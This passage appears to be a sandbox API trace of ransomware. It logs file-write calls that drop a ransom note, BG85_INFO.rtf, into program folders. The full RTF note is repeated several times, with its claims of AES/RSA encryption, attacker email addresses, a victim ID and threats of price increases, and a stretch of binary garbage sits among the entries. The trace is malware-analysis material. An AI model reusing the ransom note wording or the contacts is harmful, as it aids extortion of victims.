c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2662a08, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n÷!&ø~@\x9ee9»Ñ%âÔ^\x1fÍ\nÐqO¢\x12m\x054\x83ØÍ\x12×\x92j6ftR\x8a\x86\x93âf\rr\x9b5ôîéVxR;\x04¨¶/j¤Rü\x8b\x07\x13¦\x88\x88\x1aj\x1b\x8ab\x80U\x12m¡#\x1a\x92è\x16Q2\x9f\x93\x19ToÝ\x87\x96ßé°Óìm!¨rÈô'_\x0e&!ÞÚ\x0cêúó¿\x80\x0ef\x1f¬0(H \x9f\x02\x06Ø»þ8¡\x04ÁkS,{Â*q\x8bïæ\x7fÈ\x04ù°¬ÙvâYÒ`\x9d\x1d\x10´¬\x82W·º Jγ§…Îm\x1cu\x8b\\\x95\x84\x93òï\x91\x0f\x04\x06À`\x1dL\x99\x0f\"ä\x06\x95û\x9f0\x8c\x93G0ÌG\x80Ì\x7fòá½\x9d>\x03l", lpUsedDefaultChar=0x0) returned 7247 [0070.445] WriteFile (in: hFile=0x1e4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0070.446] CloseHandle (hObject=0x1e4) returned 1 [0070.447] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\bg85_info.rtf")) returned 0xffffffff [0070.447] GetLastError () returned 0x2 [0070.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st 